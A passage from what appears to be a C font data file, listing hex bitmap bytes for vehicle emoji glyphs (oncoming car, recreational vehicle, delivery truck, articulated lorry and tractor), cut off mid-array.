0x0, 0xe0, 0x1, 0xc1, 0xe0, 0x0, 0x3, 0xe1,
0xc0, 0x0, 0xe0, 0x1, 0xe0, 0xf0, 0x0, 0x1f,
0xc1, 0xc0, 0x0, 0xe0, 0x1, 0xc0, 0x3c, 0x0,
0x7f, 0x3, 0xff, 0xff, 0xff, 0xff, 0x80, 0x1e,
0x1, 0xf8, 0x1, 0xff, 0xff, 0xff, 0xff, 0x0,
0x3e, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe7, 0x3c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc7, 0x3f, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0x87, 0x7f, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0x70, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0xf0,
0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe7,
0xe0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x77, 0xe0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x77, 0xe0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x1,
0xf8, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x7, 0xe0,
0x7, 0xfe, 0x0, 0x0, 0x0, 0x7, 0xfe, 0x7,
0xe0, 0xf, 0xff, 0x0, 0x0, 0x0, 0xf, 0xff,
0x7, 0xe0, 0x1f, 0xf, 0x80, 0x0, 0x0, 0x1f,
0xf, 0x87, 0x70, 0x1c, 0x7, 0x80, 0x0, 0x0,
0x1e, 0x3, 0x87, 0x78, 0x38, 0x3, 0xc0, 0x0,
0x0, 0x3c, 0x3, 0xc7, 0x3e, 0x38, 0x1, 0xc0,
0x0, 0x0, 0x38, 0x1, 0xc7, 0x1f, 0xf8, 0x1,
0xff, 0xff, 0xff, 0xf8, 0x1, 0xfe, 0x3, 0xf8,
0x1, 0xff, 0xff, 0xff, 0xf8, 0x1, 0xfc, 0x0,
0x38, 0x3, 0xc0, 0x0, 0x0, 0x38, 0x1, 0xc0,
0x0, 0x38, 0x3, 0xc0, 0x0, 0x0, 0x3c, 0x3,
0xc0, 0x0, 0x1c, 0x7, 0x80, 0x0, 0x0, 0x1e,
0x3, 0x80, 0x0, 0x1f, 0xf, 0x0, 0x0, 0x0,
0x1f, 0xf, 0x80, 0x0, 0xf, 0xff, 0x0, 0x0,
0x0, 0xf, 0xff, 0x0, 0x0, 0x7, 0xfc, 0x0,
0x0, 0x0, 0x7, 0xfe, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
/* U+1F698 "🚘" */
0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x18,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x30, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x6, 0x0, 0x0, 0x0, 0xe,
0xf, 0xe0, 0x0, 0xf, 0xe0, 0xe0, 0x0, 0x0,
0x3, 0x83, 0xfe, 0x0, 0x3, 0xfe, 0xc, 0x0,
0x0, 0x0, 0x70, 0x7f, 0xc0, 0x0, 0x7f, 0xc1,
0x80, 0x0, 0x0, 0x1e, 0xf, 0xf8, 0x0, 0xf,
0xf8, 0x38, 0x0, 0x0, 0x3, 0x81, 0xff, 0x80,
0x3, 0xff, 0x3, 0x0, 0x0, 0x0, 0x70, 0x3f,
0xf0, 0x0, 0x7f, 0xe0, 0x70, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x3,
0xe3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc1,
0xe1, 0xfc, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x7f, 0x7f, 0x9f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x8f, 0xef, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdf, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xf0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0xe3, 0xff,
0xc0, 0x0, 0x0, 0x1f, 0xfe, 0x30, 0x0, 0x1c,
0x7f, 0xf8, 0x0, 0x0, 0x3, 0xff, 0xc7, 0x0,
0x7, 0xc, 0x3, 0x0, 0x0, 0x0, 0x60, 0x18,
0x60, 0x0, 0xe1, 0x80, 0x60, 0x0, 0x0, 0xc,
0x3, 0xc, 0x0, 0x1c, 0x30, 0xc, 0x0, 0x0,
0x1, 0x80, 0x61, 0xc0, 0x3, 0x87, 0x1, 0x80,
0x0, 0x0, 0x30, 0x1c, 0x38, 0x0, 0xe0, 0x7f,
0xf0, 0x0, 0x0, 0x7, 0xff, 0x3, 0x0, 0x1c,
0x7, 0xfe, 0x0, 0x0, 0x0, 0xff, 0xc0, 0x60,
0x3, 0x80, 0x0, 0x3, 0xff, 0xfe, 0x0, 0x0,
0xc, 0x0, 0x70, 0x0, 0x1, 0xff, 0xff, 0xf8,
0x0, 0x1, 0x80, 0xe, 0x0, 0x0, 0x7f, 0xff,
0xff, 0x0, 0x0, 0x30, 0x1, 0xc0, 0x0, 0x7,
0xff, 0xff, 0xc0, 0x0, 0x6, 0x0, 0x38, 0x0,
0x0, 0xff, 0xff, 0xf8, 0x0, 0x0, 0xc0, 0x7,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x18,
0x0, 0xe0, 0x0, 0x1, 0xff, 0xff, 0xc0, 0x0,
0x3, 0x0, 0x1c, 0x0, 0x0, 0x3f, 0xff, 0xf8,
0x0, 0x0, 0x60, 0x3, 0xc0, 0x0, 0x3, 0xff,
0xfe, 0x0, 0x0, 0x1c, 0x0, 0x7f, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x80, 0xe, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0xff, 0xb0, 0x0,
0xc3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x6,
0x0, 0x1c, 0x1, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1, 0xc0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x7, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x3f, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xf8, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0x0, 0x0, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0, 0x0, 0x1f,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0,
0x3, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0x80, 0x0, 0x7f, 0x80, 0x0, 0x0, 0x0, 0x0,
0xf, 0xf0, 0x0, 0xf, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xfe, 0x0,
/* U+1F699 "🚙" */
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x0, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x3, 0x0, 0x0,
0x0, 0x0, 0x70, 0xff, 0xfc, 0x3f, 0xf8, 0x70,
0x0, 0x0, 0x0, 0x1c, 0x3f, 0xff, 0x87, 0xff,
0x8e, 0x0, 0x0, 0x0, 0x7, 0xe, 0x0, 0x30,
0xc0, 0x71, 0xc0, 0x0, 0x0, 0x1, 0xc3, 0xc0,
0x6, 0x18, 0x6, 0x38, 0x0, 0x0, 0x0, 0x70,
0xf0, 0x0, 0xc3, 0x0, 0xc7, 0x0, 0x0, 0x0,
0xc, 0x1c, 0x0, 0x18, 0x60, 0x18, 0x60, 0x0,
0x0, 0x3, 0x87, 0x0, 0x3, 0xc, 0x3, 0xc,
0x0, 0x0, 0x0, 0xe1, 0xc0, 0x0, 0x61, 0x80,
0x61, 0x80, 0x0, 0x0, 0x38, 0x70, 0x0, 0xc,
0x30, 0xc, 0x30, 0x0, 0x0, 0xe, 0x1e, 0x0,
0x1, 0x86, 0x1, 0x86, 0x0, 0x0, 0x3, 0x87,
0x80, 0x0, 0x30, 0xc0, 0x38, 0xc0, 0x0, 0x0,
0xe1, 0xf0, 0x0, 0x6, 0x18, 0x7, 0x1c, 0x3,
0xff, 0xf8, 0x7f, 0xff, 0xff, 0xc3, 0xff, 0xe3,
0xf8, 0xff, 0xff, 0xf, 0xff, 0xff, 0xf8, 0x7f,
0xfc, 0x7f, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xe7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xfc, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x9f, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xf3,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xff, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0xee, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xfd, 0xc7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xb8, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xf7, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfe,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x3, 0xfb, 0x80, 0x1e, 0x0, 0x0, 0x0,
0x0, 0xff, 0x80, 0x7e, 0x70, 0x1f, 0xf8, 0x0,
0x0, 0x0, 0x7f, 0xfc, 0x6, 0xe, 0x7, 0xff,
0xc0, 0x0, 0x0, 0x1f, 0xff, 0xc0, 0xc1, 0xc1,
0xff, 0xfc, 0x0, 0x0, 0x7, 0xff, 0xfc, 0x18,
0x38, 0x7f, 0xff, 0x80, 0x0, 0x1, 0xff, 0xff,
0xc3, 0x7, 0x1f, 0xc3, 0xf8, 0x0, 0x0, 0x3f,
0xc3, 0xf8, 0x60, 0xe3, 0xe0, 0x1f, 0x80, 0x0,
0xf, 0xe0, 0x1f, 0x8e, 0x3f, 0xfc, 0x3, 0xf0,
0x0, 0x1, 0xfc, 0x3, 0xff, 0xc7, 0xff, 0x0,
0x3f, 0xff, 0xff, 0xff, 0x0, 0x3f, 0xfc, 0xff,
0xe0, 0x7, 0xff, 0xff, 0xff, 0xe0, 0x7, 0xff,
0x9f, 0xfc, 0x0, 0xff, 0xff, 0xff, 0xfc, 0x0,
0xff, 0xf3, 0xff, 0x80, 0x1f, 0xff, 0xff, 0xff,
0x80, 0x1f, 0xfe, 0x0, 0x78, 0x7, 0x80, 0x0,
0x0, 0x78, 0x7, 0x80, 0x0, 0x7, 0x0, 0xe0,
0x0, 0x0, 0x7, 0x0, 0xe0, 0x0, 0x0, 0xf8,
0x7c, 0x0, 0x0, 0x0, 0xf8, 0x7c, 0x0, 0x0,
0xf, 0xff, 0x0, 0x0, 0x0, 0xf, 0xff, 0x0,
0x0, 0x0, 0xff, 0xc0, 0x0, 0x0, 0x0, 0xff,
0xc0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0,
/* U+1F69A "🚚" */
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x30, 0x1c, 0xe, 0x3, 0x80, 0x0, 0x0, 0x0,
0x1c, 0x6, 0x3, 0x81, 0xc0, 0x70, 0x0, 0x0,
0x0, 0x3, 0x80, 0xc0, 0x70, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0x70, 0x18, 0xe, 0x7, 0x1,
0xc0, 0x0, 0x0, 0x0, 0xe, 0x3, 0x1, 0xc0,
0xe0, 0x38, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x60,
0x38, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x38,
0xc, 0x7, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x7, 0x1, 0x80, 0xe0, 0x70, 0x1c, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x30, 0x1c, 0xe, 0x3, 0x80,
0x0, 0x0, 0x0, 0x1c, 0x6, 0x3, 0x81, 0xc0,
0x70, 0x0, 0x0, 0x0, 0x3, 0x80, 0xc0, 0x70,
0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0x70, 0x18,
0xe, 0x7, 0x1, 0xc0, 0x0, 0x0, 0x0, 0xe,
0x3, 0x1, 0xc0, 0xe0, 0x38, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x60, 0x38, 0x1c, 0x7, 0x0, 0x3,
0xff, 0xff, 0xf8, 0xc, 0x7, 0x3, 0x80, 0xe0,
0x0, 0xff, 0xff, 0xff, 0x1, 0x80, 0xe0, 0x70,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0xe0, 0x30, 0x1c,
0xe, 0x3, 0x80, 0x7, 0x0, 0x0, 0x1c, 0x6,
0x3, 0x81, 0xc0, 0x70, 0x1, 0xc0, 0x0, 0x3,
0x80, 0xc0, 0x70, 0x38, 0xe, 0x0, 0x30, 0x3f,
0xf0, 0x70, 0x18, 0xe, 0x7, 0x1, 0xc0, 0xe,
0x1f, 0xfe, 0xe, 0x3, 0x1, 0xc0, 0xe0, 0x38,
0x3, 0x83, 0x1, 0xc1, 0xc0, 0x60, 0x38, 0x1c,
0x7, 0x0, 0x60, 0xe0, 0x38, 0x38, 0xc, 0x7,
0x3, 0x80, 0xe0, 0x1c, 0x38, 0x7, 0x7, 0x1,
0x80, 0xe0, 0x70, 0x1c, 0x7, 0x6, 0x0, 0xe0,
0xe0, 0x30, 0x1c, 0xe, 0x3, 0x80, 0xc1, 0xc0,
0x1c, 0x1c, 0x6, 0x3, 0x81, 0xc0, 0x70, 0x38,
0x70, 0x3, 0x83, 0x80, 0xc0, 0x70, 0x38, 0xe,
0xe, 0xe, 0x0, 0x70, 0x70, 0x18, 0xe, 0x7,
0x1, 0xc3, 0x83, 0x80, 0xe, 0xe, 0x3, 0x1,
0xc0, 0xe0, 0x38, 0xf0, 0x60, 0x1, 0xc1, 0xc0,
0x60, 0x38, 0x1c, 0x7, 0x78, 0x1f, 0xff, 0xf8,
0x38, 0xc, 0x7, 0x3, 0x80, 0xec, 0x3, 0xff,
0xff, 0x7, 0x1, 0x80, 0xe0, 0x70, 0x1f, 0x80,
0x0, 0x0, 0x0, 0xe0, 0x30, 0x1c, 0xe, 0x3,
0xf0, 0x0, 0x0, 0x0, 0x1c, 0x6, 0x3, 0x81,
0xc0, 0x7f, 0xf8, 0x0, 0x0, 0x3, 0x80, 0xc0,
0x70, 0x38, 0xf, 0xff, 0x0, 0x0, 0x0, 0x70,
0x18, 0xe, 0x7, 0x1, 0xf8, 0x60, 0x0, 0x0,
0xe, 0x3, 0x1, 0xc0, 0xe0, 0x3f, 0xc, 0x0,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe1,
0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x3f, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x3, 0xf0, 0xf, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x3, 0xff, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0xf, 0xc0, 0xff,
0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xff, 0xff,
0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x1f,
0xff, 0xff, 0xff, 0x9f, 0xff, 0xfb, 0xff, 0xff,
0x3, 0x3, 0xfe, 0xff, 0x1, 0xff, 0xfc, 0x1f,
0xff, 0xff, 0xe0, 0x7f, 0x7, 0xf0, 0x3f, 0xff,
0x1, 0xff, 0xff, 0xfc, 0x1f, 0xc0, 0x7e, 0x3,
0xff, 0xc0, 0x1f, 0xff, 0xff, 0x83, 0xf0, 0x7,
0xc0, 0x0, 0x38, 0x3, 0x80, 0x0, 0x0, 0x7e,
0x0, 0xf8, 0x0, 0x7, 0x0, 0x70, 0x0, 0x0,
0xf, 0xc0, 0x1f, 0x80, 0x0, 0xe0, 0xe, 0x0,
0x0, 0x1, 0xf8, 0x3, 0xe0, 0x0, 0x1e, 0x3,
0xc0, 0x0, 0x0, 0x7, 0x80, 0xe0, 0x0, 0x1,
0xc0, 0x70, 0x0, 0x0, 0x0, 0xf0, 0x1c, 0x0,
0x0, 0x3e, 0x3e, 0x0, 0x0, 0x0, 0xf, 0x8f,
0x80, 0x0, 0x3, 0xff, 0x80, 0x0, 0x0, 0x0,
0xff, 0xe0, 0x0, 0x0, 0x3f, 0xe0, 0x0, 0x0,
0x0, 0xf, 0xf8, 0x0, 0x0, 0x1, 0xf0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0,
/* U+1F69B "🚛" */
0x0, 0x0, 0x1, 0xe0, 0xff, 0xff, 0xff, 0xff,
0xff, 0x0, 0x0, 0x7, 0xe0, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x0, 0x1f, 0x60, 0xc0, 0x0,
0x0, 0x0, 0x3, 0x0, 0x0, 0x38, 0x60, 0xc0,
0x0, 0x0, 0x0, 0x3, 0x0, 0x0, 0x70, 0x60,
0xc0, 0x0, 0x0, 0x0, 0x3, 0x0, 0x0, 0xe0,
0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0x0, 0x0,
0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0x0,
0x1, 0xc0, 0x60, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1, 0xff, 0xc0, 0x60, 0xff, 0xff, 0xff, 0xff,
0xff, 0x3, 0xff, 0x80, 0x60, 0xff, 0xff, 0xff,
0xff, 0xff, 0x3, 0x0, 0x0, 0x60, 0xc0, 0x0,
0x0, 0x0, 0x3, 0x7, 0x0, 0x0, 0x60, 0xc0,
0x0, 0x0, 0x0, 0x3, 0x6, 0x0, 0x0, 0x60,
0xc0, 0x0, 0x0, 0x0, 0x3, 0x6, 0x0, 0x0,
0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xe, 0x1f,
0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xc,
0x3f, 0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0, 0x3,
0x1c, 0x30, 0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0,
0x3, 0x1c, 0x60, 0xe0, 0x60, 0xc0, 0x0, 0x0,
0x0, 0x3, 0x18, 0x60, 0xe0, 0x60, 0xc0, 0x0,
0x0, 0x0, 0x3, 0x38, 0xe0, 0xe0, 0x60, 0xc0,
0x0, 0x0, 0x0, 0x3, 0x30, 0xc0, 0xe0, 0x60,
0xc0, 0x0, 0x0, 0x0, 0x3, 0x71, 0xc0, 0xe0,
0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0x71, 0x80,
0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0x63,
0x80, 0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0, 0x3,
0xe3, 0x80, 0xe0, 0x60, 0xc0, 0x0, 0x0, 0x0,
0x3, 0xc3, 0xff, 0xe0, 0x60, 0xc0, 0x0, 0x0,
0x0, 0x3, 0xc7, 0xff, 0xe0, 0x60, 0xc0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x60, 0xc0,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x60,
0xc0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0,
0x0, 0x60, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x60, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x60, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x60, 0xc0, 0x0, 0x0,
0x0, 0x3, 0xfe, 0x0, 0x0, 0x60, 0xc0, 0x0,
0x0, 0x0, 0x3, 0xfe, 0x0, 0x0, 0x60, 0xc0,
0x0, 0x0, 0x0, 0x3, 0xc6, 0x0, 0x0, 0x60,
0xc0, 0x0, 0x0, 0x0, 0x3, 0xc6, 0x0, 0x0,
0x60, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xc7, 0xff,
0xff, 0xe0, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xc7,
0xff, 0xff, 0xe0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc7, 0xff, 0xff, 0xe0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x1f, 0x80, 0x1f,
0xff, 0xf8, 0xff, 0xff, 0xff, 0xe0, 0x1f, 0x80,
0x1f, 0xff, 0xf8, 0xff, 0xff, 0xff, 0xe0, 0x1f,
0x80, 0x1f, 0xff, 0xf8, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x1f, 0xff, 0xf8, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x3f, 0xff, 0xfc, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff, 0xfc, 0xff,
0xf0, 0xff, 0xff, 0xf8, 0xfc, 0x78, 0xfe, 0x1e,
0xff, 0xe0, 0xff, 0xff, 0xf0, 0x7c, 0x70, 0xfe,
0xe, 0x0, 0xe0, 0xf0, 0x0, 0x70, 0x70, 0x70,
0xfe, 0xe, 0x0, 0xf0, 0xf0, 0x0, 0x70, 0x70,
0x70, 0xfe, 0xe, 0x0, 0x71, 0xf0, 0x0, 0x78,
0xf0, 0x79, 0xff, 0x1e, 0x0, 0x7f, 0xe0, 0x0,
0x3f, 0xe0, 0x3f, 0xef, 0xfc, 0x0, 0x3f, 0xc0,
0x0, 0x1f, 0xc0, 0x1f, 0xc7, 0xf8, 0x0, 0xf,
0x80, 0x0, 0xf, 0x80, 0xf, 0x83, 0xe0,
/* U+1F69C "🚜" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x0, 0x3, 0xff,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x1,
0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x60, 0x1f, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x3, 0x0, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x18, 0x1, 0xc0, 0x60, 0xc0,
0x60, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x1c, 0x3,
0x6, 0x3, 0x80, 0x0, 0x0, 0x0, 0x6, 0x0,
0xe0, 0x30, 0x30, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x30, 0x6, 0x1, 0x81, 0x80, 0xe0, 0x0, 0x0,
0x0, 0x3, 0x80, 0x70, 0xf, 0xc, 0x7, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x3, 0x0, 0xf8, 0x60,
0x18, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x7,
0xc3, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x7, 0x1,
0x80, 0x3c, 0x18, 0x6, 0x0, 0x0, 0x0, 0x0,
0x38, 0x1c, 0x3, 0xe0, 0xc0, 0x30, 0x0, 0x0,
0x0, 0x1, 0xc0, 0xe0, 0x1f, 0x6, 0x1, 0xc0,
0x0, 0x0, 0x0, 0xe, 0x6, 0x0, 0xf8, 0x30,
0xe, 0x0, 0x0, 0x0, 0x0, 0x70, 0x70, 0xf,
0x81, 0x80, 0x70, 0x0, 0x0, 0x0, 0x3, 0x83,
0x0, 0x7c, 0xc, 0x3, 0x80, 0x0, 0x0, 0x0,
0x1c, 0x38, 0x3, 0x0, 0x60, 0x1c, 0x0, 0x0,
0x0, 0x0, 0xe1, 0x80, 0x18, 0x3, 0x0, 0x60,
0x0, 0x0, 0x0, 0x7, 0xc, 0x1, 0xc0, 0x18,
0x3, 0x0, 0x0, 0x0, 0x0, 0x38, 0xc0, 0xc,
0x0, 0xc0, 0x18, 0x0, 0x0, 0x0, 0x3f, 0xff,
0xff, 0xe0, 0x6, 0x0, 0xc0, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0x0, 0x30, 0x7, 0x0, 0x0,
0x7, 0xf8, 0x0, 0x0, 0x18, 0x1, 0x80, 0x38,
0x0, 0x0, 0xfc, 0x0, 0x0, 0x1, 0xc0, 0xc,
0x1, 0xc0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0xe,
0x0, 0x60, 0xe, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x60, 0x7f, 0xff, 0xf8, 0x0, 0xe, 0x0,
0x0, 0x0, 0x3, 0xf, 0xff, 0xff, 0xf0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x18, 0xf0, 0x0, 0x7,
0xc0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xce, 0x0,
0x0, 0x7, 0x0, 0x38, 0x0, 0x0, 0x0, 0x6,
0xe0, 0x7, 0x0, 0x1c, 0x1, 0x80, 0x3e, 0x0,
0x0, 0x36, 0x0, 0x3c, 0x0, 0x70, 0xc, 0x1,
0xfe, 0x0, 0x1, 0xf0, 0x63, 0xf3, 0x87, 0x80,
0x60, 0xf, 0xfe, 0x0, 0xf, 0x7, 0xff, 0xfe,
0x78, 0x3, 0x0, 0x1, 0xf8, 0x0, 0x70, 0x3f,
0xff, 0xf7, 0x80, 0x18, 0x1e, 0x1, 0xe0, 0x3,
0x81, 0xf8, 0x1f, 0xf8, 0x0, 0xdd, 0xfb, 0x87,
0x80, 0x38, 0xbf, 0x0, 0x3f, 0x40, 0x7, 0xff,
0xfe, 0x1e, 0x1, 0xc7, 0xe0, 0x0, 0x7f, 0x0,
0x7f, 0xff, 0xf0, 0x78, 0x1c, 0x7e, 0x0, 0x1,
0xf8, 0x3, 0xfc, 0xf, 0x81, 0xc1, 0xc3, 0xe0,
0x0, 0x7, 0xc1, 0xff, 0x80, 0x1f, 0x87, 0xe,
0xf, 0x3, 0xf0, 0x3c, 0x3f, 0xf8, 0x0, 0x7e,
0x38, 0xe0, 0x70, 0x3f, 0xc0, 0xe1, 0xff, 0x80,
0x1, 0xf1, 0xc1, 0x3, 0x83, 0xff, 0x7, 0x8f,
0xf8, 0x1e, 0x7, 0x6, 0x0, 0x38, 0x3f, 0xfc,
0x1c, 0x7f, 0x83, 0xfc, 0x38, 0x38, 0x7, 0xc1,
